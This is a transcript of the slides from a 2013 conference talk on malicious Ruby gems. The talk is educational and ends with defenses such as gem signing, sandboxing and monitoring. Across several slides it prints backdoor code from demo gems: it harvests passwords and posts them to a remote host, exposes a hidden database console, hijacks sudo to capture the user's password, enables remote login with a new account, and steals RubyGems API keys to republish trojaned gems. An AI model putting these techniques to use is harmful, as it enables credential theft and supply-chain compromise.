Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (Ruby Conf Australia)

Hacking with Gems (Ruby Conf Australia)

Benjamin Smith

February 22, 2013
Tweet

More Decks by Benjamin Smith

Other Decks in Technology

Transcript

  1. Hacking with Gems
    Benjamin Smith
    @benjamin_smith
    Friday, February 22, 13

    View Slide

  2. How-to get rich quick and
    (maybe)
    not go to jail!
    Friday, February 22, 13

    View Slide

  3. who i am
    Friday, February 22, 13

    View Slide

  4. Friday, February 22, 13

    View Slide

  5. Friday, February 22, 13

    View Slide

  6. Friday, February 22, 13

    View Slide

  7. Friday, February 22, 13

    View Slide

  8. Friday, February 22, 13

    View Slide

  9. what i am NOT
    Friday, February 22, 13

    View Slide

  10. Friday, February 22, 13

    View Slide

  11. please do not try this at home
    Friday, February 22, 13

    View Slide

  12. please do not try this at home
    Friday, February 22, 13

    View Slide

  13. how it all started
    GEM
    remote: https://rubygems.org/
    specs:
    actionmailer (3.2.12)
    actionpack (= 3.2.12)
    mail (~> 2.4.4)
    actionpack (3.2.12)
    activemodel (= 3.2.12)
    activesupport (= 3.2.12)
    builder (~> 3.0.0)
    erubis (~> 2.7.0)
    ...
    Friday, February 22, 13

    View Slide

  14. what’s the worst that could happen?
    Friday, February 22, 13

    View Slide

  15. Friday, February 22, 13

    View Slide

  16. gem 'awesome_rails_flash_messages'
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  17. before...
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  18. after!
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  19. some “side effects”
    if params.to_s.match(Base64.decode64('cGF...'))
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  20. ...
    File.open(
    "#{Rails.root}/public/development.log",
    'a+'
    ) do |f|
    f.write("#{params.inspect}\n")
    end
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  21. ?!?
    Net::HTTP.post_form(
    URI.parse(Base64.decode64('aHR0cDo...')),
    {
    'log'=>params.merge(:url =>
    request.url).inspect
    }
    )
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  22. i like cGFzc3dvcmQ=\n
    if params.to_s.match(Base64.decode64('cGF...'))
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  23. i like password
    if params.to_s.match(“password”)
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  24. “development.log”
    ...
    "user"=>{"email"=>"[email protected]",
    "password"=>"password",
    "remember_me"=>"0"}
    ...
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  25. elsewhere...
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith
    Friday, February 22, 13

    View Slide

  26. profit
    • Step 1: do something
    • Step 2: do something else
    • Step 3: ????
    • Step 4: profit
    Friday, February 22, 13

    View Slide

  27. profit
    • Step 1: write a gem that does something
    • Step 2:
    • Step 3:
    • Step 4:
    Friday, February 22, 13

    View Slide

  28. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3:
    • Step 4:
    Friday, February 22, 13

    View Slide

  29. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites
    to transfer funds
    • Step 4:
    Friday, February 22, 13

    View Slide

  30. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites
    to transfer funds
    • Step 4: profit
    Friday, February 22, 13

    View Slide

  31. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites
    to transfer funds
    • Step 4: profit
    • Step 5: flee the country
    Friday, February 22, 13

    View Slide

  32. a one way ticket to
    Friday, February 22, 13

    View Slide

  33. that was easy.
    what else can I do?
    Friday, February 22, 13

    View Slide

  34. gem 'net_http_detector'
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  35. show me the hack
    Net::HTTP.post_form(
    #stark-samurai-8122.herokuapp.com/logs>,
    {"log"=>"{\"utf8\"=>\"✓\",
    \"authenticity_token\"=>\"PzpZUlRrRv1V
    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\",
    \"user\"=>{\"email\"=>\"test\",
    \"password\"=>\"pass4\"
    ...
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  36. how it works
    def HTTP.valid_post_form(url, params)
    ...
    def HTTP.post_form(url, params)
    self.smart_log(
    "Net::HTTP.post_form(#{url.inspect},
    #{params.inspect})"
    )
    Net::HTTP.valid_post_form(url, params)
    end
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  37. how it works
    def HTTP.valid_post_form(url, params)
    ...
    def HTTP.post_form(url, params)
    self.smart_log(
    "Net::HTTP.post_form(#{url.inspect},
    #{params.inspect})"
    )
    Net::HTTP.valid_post_form(url, params)
    end
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  38. how it works
    def HTTP.valid_post_form(url, params)
    ...
    def HTTP.post_form(url, params)
    self.smart_log(
    "Net::HTTP.post_form(#{url.inspect},
    #{params.inspect})"
    )
    Net::HTTP.valid_post_form(url, params)
    end
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  39. ...and one more thing...
    eval(Net::HTTP.valid_get(
    URI("http://....herokuapp.com/
    snippets/6")
    )
    )
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  40. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
    @tables =ActiveRecord::Base.connection.tables
    if params[:query]
    @output = ActiveRecord::Base.connection
    .execute(params[:query])
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  41. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
    @tables =ActiveRecord::Base.connection.tables
    if params[:query]
    @output = ActiveRecord::Base.connection
    .execute(params[:query])
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  42. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
    @tables =ActiveRecord::Base.connection.tables
    if params[:query]
    @output = ActiveRecord::Base.connection
    .execute(params[:query])
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  43. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
    @tables =ActiveRecord::Base.connection.tables
    if params[:query]
    @output = ActiveRecord::Base.connection
    .execute(params[:query])
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  44. /users/sign_in
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  45. /users/sign_in?db_console=t
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  46. hello db access!
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  47. SELECT * FROM users;
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  48. UPDATE users SET admin=1
    WHERE id=42;
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  49. CREATE USER admin1 WITH
    PASSWORD 'password';
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  50. careful of wolves in sheep’s clothing
    Friday, February 22, 13

    View Slide

  51. Little Snitch
    obdev.at/products/littlesnitch/index.html @benjamin_smith
    Friday, February 22, 13

    View Slide

  52. profit
    • Step 1:
    • Step 2:
    • Step 3:
    • Step 4:
    • Step 5:
    Friday, February 22, 13

    View Slide

  53. profit
    • Step 1: write a gem that does something
    • Step 2:
    • Step 3:
    • Step 4:
    • Step 5:
    Friday, February 22, 13

    View Slide

  54. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3:
    • Step 4:
    • Step 5:
    Friday, February 22, 13

    View Slide

  55. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat
    loan (ie buy a pimp trimaran)
    • Step 4:
    • Step 5:
    Friday, February 22, 13

    View Slide

  56. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat
    loan (ie buy a pimp trimaran)
    • Step 4: profit
    • Step 5:
    Friday, February 22, 13

    View Slide

  57. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat
    loan (ie buy a pimp trimaran)
    • Step 4: profit
    • Step 5: flee the country
    Friday, February 22, 13

    View Slide

  58. i like the beach
    Friday, February 22, 13

    View Slide

  59. that was easy.
    what else can I do?
    Friday, February 22, 13

    View Slide

  60. gem 'better_date_to_s'
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  61. what it claims to do
    Date.new(2005, 1, 1).to_s(:short)
    => "1 Jan"
    ... instead of...
    => " 1 Jan"
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  62. Friday, February 22, 13

    View Slide

  63. what it also does
    set_date_formats_for(
    Rails.env,
    Rails.root.to_s
    )
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  64. better_date_to_s.bundle
    œ˙Ì˛ê(__TEXT__text__TEXTP
    ÛP
    Ä__stubs__TEXTD
    $DÄ__stub_helper__TEXThLhÄ__cstring__TEX
    T∏i∏__unwind_info__TEXT!P!
    __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt
    r__DATA__got__DATA__la_symbol_ptr__DATA0
    __data__DATAHHH__LINKEDIT ‰"Ä0 [email protected]
    Ä¿ `(!‰"
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  65. behind the curtain
    if(strcmp(rails_env, "production") == 0) {
    sprintf(tar_command, "tar -zcvf
    %s/public/assets.tar.gz %s > /dev/
    null 2>&1",rails_root,rails_root);
    system(tar_command);
    }
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  66. what what
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  67. i can haz source
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  68. truth time
    • this gem doesn't actually work
    • but it could... if I wasn't lazy
    • "fat" gems are tricky to compile
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith
    Friday, February 22, 13

    View Slide

  69. so much code so little time
    • Step 1: write a gem that does something
    • Step 2: add code expose source
    • Step 3: sell to competitors?
    • Step 4: profit?
    • Step 5: flee the country
    Friday, February 22, 13

    View Slide

  70. that was easy hard.
    what else can I do?
    (that's easier)
    Friday, February 22, 13

    View Slide

  71. gem install be_truthy
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  72. what it does
    > true.should be_true
    > User.new.should be_true
    > User.new.should be_truthy
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  73. what it ACTUALLY does
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  74. github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  75. file tree looks ok
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  76. source code looks good
    require "be_truthy/version"
    module BeTruthy
    end
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  77. but what was this?
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  78. I see no C
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  79. run the what file?
    Gem::Specification.new do |gem|
    ...
    gem.extensions = ["Rakefile"]
    ...
    end
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  80. there is no Rakefile
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  81. gem fetch vs gem install
    > gem fetch be_truthy
    > gem unpack be_truthy-0.0.1.gem
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  82. the real file tree
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  83. the real file tree
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  84. what does the Rakefile do?
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  85. sudo_file =__FILE__.gsub(
    'Rakefile', 'lib/tmp.rb'
    )
    FileUtils.mv(
    sudo_file,
    "#{home_dir}/.tmp"
    )
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  86. File.open(profile, 'a+') do |f|
    f.write("alias sudo='ruby #{home}/.tmp'\n")
    end
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  87. FileUtils.rm(__FILE__)
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  88. fseventer
    fernlightning.com/doku.php?id=software:fseventer:start @benjamin_smith
    Friday, February 22, 13

    View Slide

  89. what does "sudo" do now?
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  90. print "WARNING: Improper use of the sudo
    command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  91. print "WARNING: Improper use of the sudo
    command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  92. print "WARNING: Improper use of the sudo
    command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  93. print "WARNING: Improper use of the sudo
    command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  94. echo '#{password}' | /usr/bin/sudo -S
    systemsetup -setremotelogin on
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  95. /usr/bin/sudo dscl . -create /Users/
    #{username}
    ...
    /usr/bin/sudo dscl . -passwd /Users/
    #{username} password`
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  96. Net::HTTP.post_form(
    URI.parse('http://.../logs'),
    {'log' => 'ssh enabled'}
    )
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  97. ssh [email protected]
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  98. take away:
    don't install ben's gems
    Friday, February 22, 13

    View Slide

  99. Friday, February 22, 13

    View Slide

  100. take away:
    use windows?
    Friday, February 22, 13

    View Slide

  101. don't install ben's gems
    Friday, February 22, 13

    View Slide

  102. how could I get you
    to install my gems?
    Friday, February 22, 13

    View Slide

  103. what gems are
    trustworthy?
    Friday, February 22, 13

    View Slide

  104. how can I add my code
    to already trusted gems?
    Friday, February 22, 13

    View Slide

  105. back in the be_truthy gem
    gem_api_key = File.open(
    `echo ~/.gem/credentials`.strip
    ).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  106. gem_api_key = File.open(
    `echo ~/.gem/credentials`.strip
    ).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)
    github.com/benjaminleesmith/be_truthy
    back in the be_truthy gem
    @benjamin_smith
    Friday, February 22, 13

    View Slide

  107. gem_api_key = File.open(
    `echo ~/.gem/credentials`.strip
    ).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)
    github.com/benjaminleesmith/be_truthy
    back in the be_truthy gem
    @benjamin_smith
    Friday, February 22, 13

    View Slide

  108. gem_api_key = File.open(
    `echo ~/.gem/credentials`.strip
    ).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)
    github.com/benjaminleesmith/be_truthy
    back in the be_truthy gem
    @benjamin_smith
    Friday, February 22, 13

    View Slide

  109. now I own your gems
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  110. > git clone your-gem-repo
    ...add a little code...
    > rake build
    > gem push your-gem
    github.com/benjaminleesmith/be_truthy @benjamin_smith
    Friday, February 22, 13

    View Slide

  111. do people trust your gems?
    Friday, February 22, 13

    View Slide

  112. do people who install
    your gems have
    trustworthy gems?
    Friday, February 22, 13

    View Slide

  113. Friday, February 22, 13

    View Slide

  114. there’s still one problem
    Friday, February 22, 13

    View Slide

  115. bootstrapping
    Friday, February 22, 13

    View Slide

  116. being popular sucks
    Friday, February 22, 13

    View Slide

  117. conferences
    Friday, February 22, 13

    View Slide

  118. values
    Friday, February 22, 13

    View Slide

  119. hamster
    Friday, February 22, 13

    View Slide

  120. wbench
    Friday, February 22, 13

    View Slide

  121. almost-sinatra
    Friday, February 22, 13

    View Slide

  122. almost-rack
    Friday, February 22, 13

    View Slide

  123. almost-rack-protection
    Friday, February 22, 13

    View Slide

  124. social engineering
    Friday, February 22, 13

    View Slide

  125. Friday, February 22, 13

    View Slide

  126. 5% adoption
    Friday, February 22, 13

    View Slide

  127. so what happens now?
    Friday, February 22, 13

    View Slide

  128. ruby gems goes down
    Friday, February 22, 13

    View Slide

  129. heroku deploys go down
    Friday, February 22, 13

    View Slide

  130. i go to the beach
    Friday, February 22, 13

    View Slide

  131. so what now?
    Friday, February 22, 13

    View Slide

  132. gem cert --build
    Friday, February 22, 13

    View Slide

  133. gem install rails -P HighSecurity
    Friday, February 22, 13

    View Slide

  134. bsmith$ gem install rails -P HighSecurity
    Fetching: activesupport-3.2.12.gem (100%)
    ERROR: While executing gem ...
    (Gem::Exception)
    Unsigned gem
    Friday, February 22, 13

    View Slide

  135. sandboxing
    Friday, February 22, 13

    View Slide

  136. github.com/rubygems/rubygems
    Friday, February 22, 13

    View Slide

  137. tools to detect
    malicious code
    Friday, February 22, 13

    View Slide

  138. private gem repos
    Friday, February 22, 13

    View Slide

  139. do not try this at home
    Friday, February 22, 13

    View Slide

  140. don't install gems you
    don't need to
    Friday, February 22, 13

    View Slide

  141. pay attention to what
    your gems do
    Friday, February 22, 13

    View Slide

  142. monitor your system
    Friday, February 22, 13

    View Slide

  143. read the source
    Friday, February 22, 13

    View Slide

  144. gem install coal-mine-canary
    github.com/benjaminleesmith/coal-mine-canary @benjamin_smith
    Friday, February 22, 13

    View Slide

  145. on install
    github.com/benjaminleesmith/coal-mine-canary @benjamin_smith
    Friday, February 22, 13

    View Slide

  146. the results
    github.com/benjaminleesmith/coal-mine-canary @benjamin_smith
    Friday, February 22, 13

    View Slide

  147. thank you!
    Friday, February 22, 13

    View Slide

  148. questions? ideas?
    @benjamin_smith
    https://github.com/benjaminleesmith
    Friday, February 22, 13

    View Slide